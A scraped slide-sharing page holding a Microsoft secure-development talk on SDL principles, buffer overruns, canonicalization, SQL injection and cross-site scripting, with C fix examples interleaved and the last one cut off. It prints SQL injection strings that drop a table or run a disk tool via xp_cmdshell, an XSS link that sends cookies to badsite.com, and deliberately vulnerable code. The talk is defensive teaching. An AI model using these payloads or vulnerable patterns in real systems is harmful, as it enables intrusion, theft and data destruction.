Code smells and Other Malodorous Software OdorsCode smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software Odors
Clint Edmonson
 
Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015
Clint Edmonson
 
Application Architecture Jumpstart
Application Architecture JumpstartApplication Architecture Jumpstart
Application Architecture Jumpstart
Clint Edmonson
 
Agile Metrics That Matter
Agile Metrics That MatterAgile Metrics That Matter
Agile Metrics That Matter
Clint Edmonson
 
Advanced oop laws, principles, idioms
Advanced oop laws, principles, idiomsAdvanced oop laws, principles, idioms
Advanced oop laws, principles, idioms
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
ADO.NET Entity Framework
ADO.NET Entity FrameworkADO.NET Entity Framework
ADO.NET Entity Framework
Clint Edmonson
 
Windows 8 - The JavaScript Story
Windows 8 - The JavaScript StoryWindows 8 - The JavaScript Story
Windows 8 - The JavaScript Story
Clint Edmonson
 
Windows Azure Jumpstart
Windows Azure JumpstartWindows Azure Jumpstart
Windows Azure Jumpstart
Clint Edmonson
 
Introduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual MachinesIntroduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual Machines
Clint Edmonson
 
Peering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to MasterPeering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to Master
Clint Edmonson
 
Architecting Scalable Applications in the Cloud
Architecting Scalable Applications in the CloudArchitecting Scalable Applications in the Cloud
Architecting Scalable Applications in the Cloud
Clint Edmonson
 
Windows Azure jumpstart
Windows Azure jumpstartWindows Azure jumpstart
Windows Azure jumpstart
Clint Edmonson
 
Windows Azure Virtual Machines
Windows Azure Virtual MachinesWindows Azure Virtual Machines
Windows Azure Virtual Machines
Clint Edmonson
 

Recently uploaded (20)

The Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdfThe Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdf
Richard Lucas
 
Top 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job ApplicationTop 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job Application
Red Tape Busters
 
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
TheoRuby
 
Salesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptxSalesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptx
reinbauwens1
 
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025  Energy News issue - 1785 by Khaled Al Awadi_compressed.pdfNewBase 05 May 2025  Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
Khaled Al Awadi
 
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025  Energy News issue - 1783 by Khaled Al Awadi_compressed...NewBase 28 April 2025  Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
Khaled Al Awadi
 
Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)
GeorgeButtler
 
Kiran Flemish - A Dynamic Musician
Kiran  Flemish  -  A   Dynamic  MusicianKiran  Flemish  -  A   Dynamic  Musician
Kiran Flemish - A Dynamic Musician
Kiran Flemish
 
BeMetals_Presentation_May_2025 .pdf
BeMetals_Presentation_May_2025      .pdfBeMetals_Presentation_May_2025      .pdf
BeMetals_Presentation_May_2025 .pdf
DerekIwanaka2
 
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Lviv Startup Club
 
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy MemoriesPetslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify
 
waterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docxwaterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docx
Peter Adriaens
 
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
ThiNgc22
 
Alan Stalcup - The Enterprising CEO
Alan  Stalcup  -  The  Enterprising  CEOAlan  Stalcup  -  The  Enterprising  CEO
Alan Stalcup - The Enterprising CEO
Alan Stalcup
 
The Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of HatsThe Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of Hats
nimrabilal030
 
Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"
anujascentbpo
 
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdfAccounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
CA Suvidha Chaplot
 
Harnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail StrategyHarnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail Strategy
RUPAL AGARWAL
 
intra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.pptintra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.ppt
NTTDATA INTRAMART
 
Brandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled MusicianBrandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled Musician
Brandon Flatley
 
The Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdfThe Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdf
Richard Lucas
 
Top 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job ApplicationTop 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job Application
Red Tape Busters
 
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
TheoRuby
 
Salesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptxSalesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptx
reinbauwens1
 
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025  Energy News issue - 1785 by Khaled Al Awadi_compressed.pdfNewBase 05 May 2025  Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
Khaled Al Awadi
 
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025  Energy News issue - 1783 by Khaled Al Awadi_compressed...NewBase 28 April 2025  Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
Khaled Al Awadi
 
Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)
GeorgeButtler
 
Kiran Flemish - A Dynamic Musician
Kiran  Flemish  -  A   Dynamic  MusicianKiran  Flemish  -  A   Dynamic  Musician
Kiran Flemish - A Dynamic Musician
Kiran Flemish
 
BeMetals_Presentation_May_2025 .pdf
BeMetals_Presentation_May_2025      .pdfBeMetals_Presentation_May_2025      .pdf
BeMetals_Presentation_May_2025 .pdf
DerekIwanaka2
 
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Lviv Startup Club
 
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy MemoriesPetslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify
 
waterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docxwaterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docx
Peter Adriaens
 
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
ThiNgc22
 
Alan Stalcup - The Enterprising CEO
Alan  Stalcup  -  The  Enterprising  CEOAlan  Stalcup  -  The  Enterprising  CEO
Alan Stalcup - The Enterprising CEO
Alan Stalcup
 
The Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of HatsThe Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of Hats
nimrabilal030
 
Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"
anujascentbpo
 
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdfAccounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
CA Suvidha Chaplot
 
Harnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail StrategyHarnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail Strategy
RUPAL AGARWAL
 
intra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.pptintra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.ppt
NTTDATA INTRAMART
 
Brandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled MusicianBrandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled Musician
Brandon Flatley
 

Security Best Practices

  • 1. Security Best Practices. Clint Edmonson, Architect Evangelist, Microsoft Corporation, clinted@microsoft.com
  • 6. Agenda: Microsoft Security Development Lifecycle; Secure Design Principles; Clint’s Dirty Dozen
  • 7. Microsoft Security Development Lifecycle (SDL): executive commitment (SDL has been a mandatory policy at Microsoft since 2004); education; accountability; technology and process; ongoing process improvements on a 6-month cycle
  • 8. SDL Product Development Timeline (diagram)
      Milestones: Concept, Designs Complete, Test Plans Complete, Code Complete, Ship, Post-Ship
      Activities placed along the timeline: secure questions during interviews; team member training; security sign-off criteria determined; threat analysis; review old defects; check-ins checked; secure coding guidelines; use tools; data mutation and least-privilege tests; security audit; security push; SWI review; external review; learn and refine
  • 11. SDL Secure Design Principles. Core SDL secure design principles: Attack Surface Reduction; Basic Privacy; Threat Modeling; Defense in Depth; Least Privilege; Secure Defaults
  • 12. SDL Core Principle: Attack Surface Reduction
      Attack surface: any part of an application that is accessible by a human or another program. Each one of these can potentially be exploited by a malicious user.
      Attack surface reduction: minimize the number of exposed attack surface points a malicious user can discover and attempt to exploit
  • 14. Attack Surface Analysis: enumerate network inputs/outputs, file inputs/outputs, etc., and classify each entry point, e.g. authenticated or non-authenticated, etc.
  • 18. Attack Surface Analysis Tips: it is an iterative process; for every feature you also need to analyze its sub-features. Restrict access to features as much as possible
  • 19. It’s Not Just About Turning Things Off
  • 21. SDL Core Principle: Basic Privacy
      Security versus privacy. Security: establishing protective measures that defend against hostile acts or influences and protect the confidentiality of personal information. Privacy: empowering users to control the use, collection and distribution of their personal information. Security AND privacy together are key factors in trustworthy computing
  • 22. Important Note: Security Does Not Always Guarantee Privacy. It is possible to have a secure system that does not preserve users’ privacy. Authentication vs. authorization: authentication verifies who users are; authorization verifies what they can access
  • 24. Microsoft Privacy Guidelines for Developing Products and Services: documented requirements and recommendations for privacy-compliant products and services, available online for download. Microsoft customers will be empowered to control the collection, use, and distribution of their personal information
  • 25. SDL Core Principle: Threat Modeling
      Threat modeling: a process to understand threats to an application. Threats and vulnerabilities. Threats: actions a malicious user may attempt in order to compromise a system. Vulnerabilities: a specific way a threat is exploitable, such as a coding error
  • 26. Threat Modeling In a Nutshell (diagram of the product development flow)
  • 27. Microsoft Threat Modeling Tool: Microsoft has published the threat modeling tool it uses internally to assess threats against products and services; freely available online for download
  • 28. SDL Core Principle: Defense In Depth
      Defense in depth: if one defense layer is breached, what other defense layers (if any) provide additional protection to the application? Assume that software and/or hardware will fail at some point. Most applications today can be compromised when a single, and often the only, layer of defense is breached (the firewall)
  • 31. SDL Core Principle: Least Privilege
      Assume that all applications can and will be compromised. Least privilege: if an application is compromised, then the potential damage the malicious person can inflict is contained and minimized accordingly
  • 32. Least Privilege Example (diagram): privilege levels LOCAL SYSTEM, ADMIN / SYSTEM LEVEL and NON-ADMIN, each labelled with what it can do, such as read user files, change system passwords, or limited capabilities
  • 38. Least Privilege Tips: evaluate your application and think minimally! What is the minimum access level your application requires to perform its functions? Elevate privileges only when needed, and then release those elevated privileges when their purposes have been satisfied
  • 39. SDL Core Principle: Secure Defaults
      Secure defaults: deploy applications in more secure configurations by default. This helps to better ensure that customers get a safer experience with your application out of the box, not after extensive configuration. It is up to the user to reduce security and privacy levels
  • 41. Clint’s Dirty Dozen: client-side enforcement of server-side security; improper input validation; clear transmission of sensitive information; failure to preserve SQL query integrity; cross-site request forgery (HTML output integrity); error message information leak
  • 42. Clint’s Dirty Dozen (continued): file or path name leaking; critical state data exposure; improper access control (authorization); use of broken or risky cryptography algorithms; hard-coded passwords; execution with unnecessary privileges; failure to constrain operations within memory buffers (buffer overrun; a concern in unmanaged languages)
  • 43. Conclusion: safer applications begin with secure planning and design. SDL core principles: Attack Surface Reduction; Basic Privacy; Threat Modeling; Defense in Depth; Least Privilege; Secure Defaults
  • 46. Microsoft Security Development Lifecycle (SDL). SDL book: http://www.microsoft.com/mspress/books/8753.aspx. Official SDL web site: http://www.microsoft.com/sdl
  • 47. Threat Modeling Resources. Threat modeling book: http://www.microsoft.com/mspress/books/6892.aspx. Threat Modeling Tool: http://www.microsoft.com/downloads/details.aspx?FamilyID=62830f95-0e61-4f87-88a6-e7c663444ac1&displaylang=en
  • 48. Microsoft Developer Network (MSDN) Security Developer Center. Official web site: http://msdn.microsoft.com/security
  • 49. Secure Development Blogs. The Microsoft Security Development Lifecycle (SDL) Blog: http://blogs.msdn.com/sdl. Michael Howard’s Blog: http://blogs.msdn.com/michael_howard. J.D. Meier’s Security Hotspots: http://shapingsoftware.com/2009/03/09/security-hot-spots. SANS Institute Top 25 Most Dangerous Programming Errors: http://www.sans.org/top25errors
  • 50. Clint Edmonson, Architect Evangelist, Microsoft Corporation, clinted@microsoft.com. Slides available at: http://www.notsotrivial.net/slides
  • 51. © 2002 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
  • 53. Secure Design Tenets: Reduce Attack Surface; Defense in Depth; Least Privilege; Secure Defaults; Learn from Past Mistakes; Security is a Feature; Provide Application Diversity
  • 54. Reducing Attack Surface: less code running by default = less stuff to whack by default. Slammer/CodeRed would not have happened if the features were not on by default; ILoveYou (etc.) would not have happened if scripting was off. Requires less admin skill. Reduces the urgency to deploy security fixes. Usability often means “automatically”
  • 55. Input Trust Issues. “All input is evil, until proven otherwise!” The root of most vulnerabilities: buffer overruns; canonicalization issues; cross-site scripting (XSS) attacks; SQL injection attacks. Good guys give you well-formed data, bad guys don’t! Don’t rely on your client application providing clean data. Don’t assume attackers play by the rules; they go ‘under the radar’
  • 56. Buffer Overruns: been around forever; primarily a C/C++ issue (programming close to the metal!); a prime example of sloppy programming! The aim is to change the flow of execution so that the attacker’s code is called. Lack of diversity helps the attacker. (Chapter 5)
  • 57. Buffer Overruns at Work (stack diagram: buffers, other vars, EBP, EIP and args, laid out from lower to higher addresses)
        class CFoo { /* ... */ };   // declarations added so the fragment compiles
        int func(int);
        void foo(char *p, int i) {
            int j = 0;
            CFoo foo;
            int (*fp)(int) = &func;
            char b[16];             // the buffer that sits below the saved EBP/EIP
        }
  • 58. Buffer Overruns at Work (continued): the function return address (EIP) sits at a higher address than the buffers, so overrunning a buffer overwrites it: 0wn3d! Exception handlers, function pointers and virtual methods all determine execution flow as well
  • 59. Buffer Overrun Results: if you’re lucky, you get an AV, i.e. a denial of service against servers. If you’re unlucky, you get instability (best of luck debugging that one!). If you’re really unlucky, the attacker injects code into your process and executes it
  • 60. Buffer Overrun Examples: Index Server ISAPI Application (CodeRed)
        // cchAttribute is char count of user input
        WCHAR wcsAttribute[200];
        // BUG: sizeof yields the buffer size in bytes (400), but cchAttribute counts WCHARs,
        // so inputs of 200..399 characters pass the check and overrun the buffer
        if ( cchAttribute >= sizeof wcsAttribute )
            THROW( CException( DB_E_ERRORSINCOMMAND ) );
        DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute, wcsAttribute, webServer.CodePage() );
        ...
        void DecodeURLEscapes( BYTE * pIn, ULONG & l, WCHAR * pOut, ULONG ulCodePage ) {
            WCHAR * p2 = pOut;
            ULONG l2 = l;
            ...
            for( ; l2; l2-- ) {
                // write to p2 based on pIn, up to l2 bytes
  • 61. Buffer Overrun Examples: Index Server ISAPI Application (CodeRed), FIXED!
        // cchAttribute is char count of user input
        WCHAR wcsAttribute[200];
        // FIX: compare a character count against a capacity in characters
        if ( cchAttribute >= sizeof wcsAttribute / sizeof(WCHAR) )
            THROW( CException( DB_E_ERRORSINCOMMAND ) );
        DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute, wcsAttribute, webServer.CodePage() );
        ...
        void DecodeURLEscapes( BYTE * pIn, ULONG & l, WCHAR * pOut, ULONG ulCodePage ) {
            WCHAR * p2 = pOut;
            ULONG l2 = l;
            ...
            for( ; l2; l2-- ) {
                // write to p2 based on pIn, up to l2 bytes
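The byte-versus-character mix-up above redone in plain C, as an added example that is not the slide's or Index Server's code: a 16-bit WCHAR16 stands in for WCHAR, both versions of the check are kept side by side, and a decoder that takes its capacity in elements refuses input the old check would have let through.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not the slide's or Index Server's code: the CodeRed check in plain C
   with a 16-bit unit standing in for WCHAR, and a decoder that owns its bounds check. */

typedef uint16_t WCHAR16;                 /* stand-in for the Windows WCHAR type */
#define ATTR_CAP 200                      /* the slide's WCHAR wcsAttribute[200] */
#define ARRAY_LEN(a) (sizeof (a) / sizeof (a)[0])

static WCHAR16 wcs_attribute[ATTR_CAP];

/* Pre-fix predicate: a count of characters compared against a size in bytes.
   sizeof wcs_attribute is 400, so counts of 200..399 wrongly pass. */
int attr_fits_before_fix(size_t cch_attribute) {
    return cch_attribute < sizeof wcs_attribute;
}

/* Post-fix predicate: both sides in elements, so 200 and above are rejected. */
int attr_fits_after_fix(size_t cch_attribute) {
    return cch_attribute < ARRAY_LEN(wcs_attribute);
}

static int hexval(uint8_t c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes while widening bytes into 16-bit units.  Unlike the slide's
   DecodeURLEscapes, the destination capacity (in elements) is a parameter checked
   before every write, so the caller's test is no longer the only thing standing
   between the request and the stack.  Returns the number of elements written, or
   -1 if the input would not fit; nothing past cap_out_elems is ever touched. */
long decode_url_escapes(const uint8_t *in, size_t cch_in,
                        WCHAR16 *out, size_t cap_out_elems) {
    size_t i = 0, n = 0;
    while (i < cch_in) {
        uint8_t unit = in[i];
        if (unit == '%' && i + 2 < cch_in) {
            int hi = hexval(in[i + 1]), lo = hexval(in[i + 2]);
            if (hi >= 0 && lo >= 0) {
                unit = (uint8_t)(hi * 16 + lo);
                i += 2;                   /* consumed the two hex digits */
            }
        }
        if (n >= cap_out_elems) return -1;    /* would overrun: refuse instead */
        out[n++] = unit;
        i++;
    }
    return (long)n;
}

int main(void) {
    const char *request = "a%20b";        /* constructed sample input */
    long n = decode_url_escapes((const uint8_t *)request, 5,
                                wcs_attribute, ARRAY_LEN(wcs_attribute));
    printf("decoded %ld element(s)\n", n);
    printf("300-char input passes old check: %d, new check: %d\n",
           attr_fits_before_fix(300), attr_fits_after_fix(300));
    return 0;
}
```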
  • 62. Using strncpy: naïve use of strncpy is no fix. It may not null-terminate the string (the shell version, StrCpyN, and Windows lstrcpy do, however). Performance issues. Third-arg sizeof mix-ups and off-by-one errors: the third argument is the total size of the destination buffer. Consider strsafe.h/ntstrsafe.h (in the Platform SDK, MSDN and VS.NET 2003)
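The strncpy pitfall next to a bounded copy with the semantics the slide points to in strsafe.h, as an added example that is not from the slide; safe_copy is a stand-in written here, not StringCchCopy.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slide: the strncpy pitfall beside a bounded copy with
   strsafe-style semantics.  safe_copy is a stand-in written here, not StringCchCopy. */

enum { COPY_OK = 0, COPY_TRUNCATED = 1, COPY_BAD_ARGS = -1 };

/* Copy at most cap-1 characters into dst and always write the terminator.
   cap is the total size of dst in characters (the slide's "total size of
   destination buffer"), never the length of the source and never sizeof a pointer. */
int safe_copy(char *dst, size_t cap, const char *src) {
    if (dst == NULL || src == NULL || cap == 0) return COPY_BAD_ARGS;
    size_t i = 0;
    while (i < cap - 1 && src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return src[i] == '\0' ? COPY_OK : COPY_TRUNCATED;
}

/* Reproduce the pitfall: when src has n or more characters, strncpy writes no
   terminator at all, and the next strlen/printf runs off the end of dst.
   Returns 1 if a terminator landed within the first n bytes, 0 if not. */
int strncpy_terminates(char *dst, size_t n, const char *src) {
    strncpy(dst, src, n);
    for (size_t i = 0; i < n; i++) {
        if (dst[i] == '\0') return 1;
    }
    return 0;
}

int main(void) {
    char buf[8];
    memset(buf, 'X', sizeof buf);             /* constructed: pre-fill to expose the gap */
    printf("strncpy terminated: %d\n",
           strncpy_terminates(buf, sizeof buf, "too long a string"));
    int rc = safe_copy(buf, sizeof buf, "too long a string");
    printf("safe_copy rc=%d -> \"%s\"\n", rc, buf);   /* rc=1, "too lon" */
    return 0;
}
```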
  • 63. The VC++ /GS Flag: a VC++.NET compile-time option that adds run-time code to certain functions (unmanaged C/C++). A random value called a ‘cookie’ is inserted into the stack and used to validate that various stack data is not corrupt. Most of Windows Server 2003 and VS.NET is compiled with this option, as is Windows XP SP2. Minimal perf hit: 4 instructions!
  • 64. What /GS is NOT: a panacea, or a cure for lazy developers! Crap code + /GS == crap code! It only catches some stack-smashing attacks and gives no heap protection. It’s an insurance policy
  • 65. Fixing Buffer Overruns: trace data coming in from the ‘outside’ and watch for data as it moves from untrusted to trusted boundaries. Build appropriate test plans using data mutation. Be wary of certain functions: strcpy, CopyMemory, MultiByteToWideChar, sprintf(…,"%s",…) (refer to Writing Secure Code 2nd Edition for the list) and APIs which use byte vs. char counts. There is no such thing as ‘bad functions’, only ‘bad developers’, and the problem is not limited to copy functions. Compile with /GS. Windows Server 2003 on AMD Opteron™ adds the /noexecute boot option
  • 66. Canonicalization Issues: never make a decision based on the name of a file; chances are good that you’ll get it wrong. Often, there is more than one way to name something
  • 69. The Turkish-I problem (applies also to Azerbaijan!)
        // Do not allow "FILE://" URLs   (deny-list: breaks under a Turkish locale)
        if (url.ToUpper().Left(4) == "FILE")
            return ERROR;
        getStuff(url);
        // Only allow "HTTP://" URLs   (allow-list with culture-invariant casing)
        if (url.ToUpper(CULTURE_INVARIANT).Left(4) == "HTTP")
            getStuff(url);
        else
            return ERROR;
      Turkish has four letter ‘I’s: i (U+0069), ı (U+0131), İ (U+0130), I (U+0049). In the Turkish locale UC("file") == "FİLE", so the upper-cased string never equals "FILE" and the deny-list check is bypassed
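The allow-list version of the check in C, as an added example rather than the slide's code: the scheme comparison folds only ASCII letters itself, so the locale's case mapping (and the Turkish İ) never enters into the decision.

```c
#include <stddef.h>
#include <stdio.h>

/* Added example, not the slide's code: an allow-list scheme check that does its own
   ASCII-only case folding, so the locale's case mapping (and the Turkish İ) never
   takes part in the decision. */

static unsigned char ascii_lower(unsigned char c) {
    return (c >= 'A' && c <= 'Z') ? (unsigned char)(c + ('a' - 'A')) : c;
}

/* Return 1 if url starts with scheme followed by "://".  Letters are compared
   ASCII-case-insensitively; any non-ASCII byte fails the match outright.
   scheme must be given in lowercase ASCII. */
int has_scheme(const char *url, const char *scheme) {
    size_t i = 0;
    for (; scheme[i] != '\0'; i++) {
        unsigned char c = (unsigned char)url[i];
        if (c == '\0' || c >= 0x80) return 0;         /* end of input, or not ASCII */
        if (ascii_lower(c) != (unsigned char)scheme[i]) return 0;
    }
    return url[i] == ':' && url[i + 1] == '/' && url[i + 2] == '/';
}

/* The allow-list shape from the slide: fetch only what is known to be acceptable;
   everything else, including any spelling of "file", falls through to the error path. */
int url_allowed(const char *url) {
    return has_scheme(url, "http") || has_scheme(url, "https");
}

int main(void) {
    /* constructed samples; the third spells FILE with U+0130 (UTF-8 bytes C4 B0) */
    const char *samples[] = { "HTTP://example.test/", "file:///tmp/x", "F" "\xC4\xB0" "LE://x" };
    for (size_t i = 0; i < 3; i++)
        printf("%-24s allowed=%d\n", samples[i], url_allowed(samples[i]));
    return 0;
}
```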
  • 70. SQL Injection – C# (the ID is concatenated straight into the query text)
        string Status = "No";
        string sqlstring = "";
        try {
            SqlConnection sql = new SqlConnection(
                @"data source=localhost;" + "user id=sa;password=password;");
            sql.Open();
            sqlstring = "SELECT HasShipped" + " FROM detail WHERE ID='" + Id + "'";
            SqlCommand cmd = new SqlCommand(sqlstring, sql);
            if ((int)cmd.ExecuteScalar() != 0)
                Status = "Yes";
        } catch (SqlException se) {
            Status = sqlstring + " failed\n\r";
            foreach (SqlError e in se.Errors) {
                Status += e.Message + "\n\r";
            }
        } catch (Exception e) {
            Status = e.ToString();
        }
  • 71. Why It’s Wrong (1 of 2)
      Good guy, ID: 1001
        SELECT HasShipped FROM detail WHERE ID='1001'
      Not so good guy, ID: 1001' or 1=1 --
        SELECT HasShipped FROM detail WHERE ID='1001' or 1=1 -- '
  • 72. Why It’s Wrong (2 of 2)
      Really bad guy, ID: 1001'; drop table orders --
        SELECT HasShipped FROM detail WHERE ID='1001'; drop table orders -- '
      Downright evil guy, ID: 1001'; exec xp_cmdshell('fdisk.exe') --
        SELECT HasShipped FROM detail WHERE ID='1001'; exec xp_cmdshell('fdisk.exe') -- '
  • 73. Cross Site Scripting: a very common vulnerability (the Nov01 Passport issue was CSS). A flaw in a server that leads to compromise in a client. The fault is simply echoing user input, and trusting user input!
  • 74. CSS In Action: the attacker owns badsite.com; Welcome.asp on the vulnerable site echoes the query string unencoded:
        Hello, <%= request.querystring('name') %>
  • 75. CSS In Action: the link the victim is lured into clicking, which submits the victim’s cookie to badsite.com
        <a href=http://www.insecuresite.com/welcome.asp?name=
          <FORM action=http://www.badsite.com/data.asp method=post id="idForm">
            <INPUT name="cookie" type="hidden">
          </FORM>
          <SCRIPT>
            idForm.cookie.value=document.cookie;
            idForm.submit();
          </SCRIPT>>here</a>
  • 76. Input Remedies: all input is evil until proven otherwise. Require authenticated connections. Sanitize all input: look for valid data and reject everything else; high-level languages can use RegExp, e.g. SSN = ^\d{3}-\d{2}-\d{4}$. Make no assumptions about the trustworthiness of data. Never directly echo web-based user input: verify input, then echo it, and at the very least HTML or URL encode the output. ASP.NET adds the ValidateRequest option. Use SQL parameterized queries
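Both remedies the slide names, as an added example that is not from the slide: an allow-list check for the SSN pattern, hand-coded so no regex library is needed, and HTML encoding before echoing a value the way Welcome.asp failed to; render_greeting is an assumed stand-in for that page.

```c
#include <stddef.h>
#include <stdio.h>
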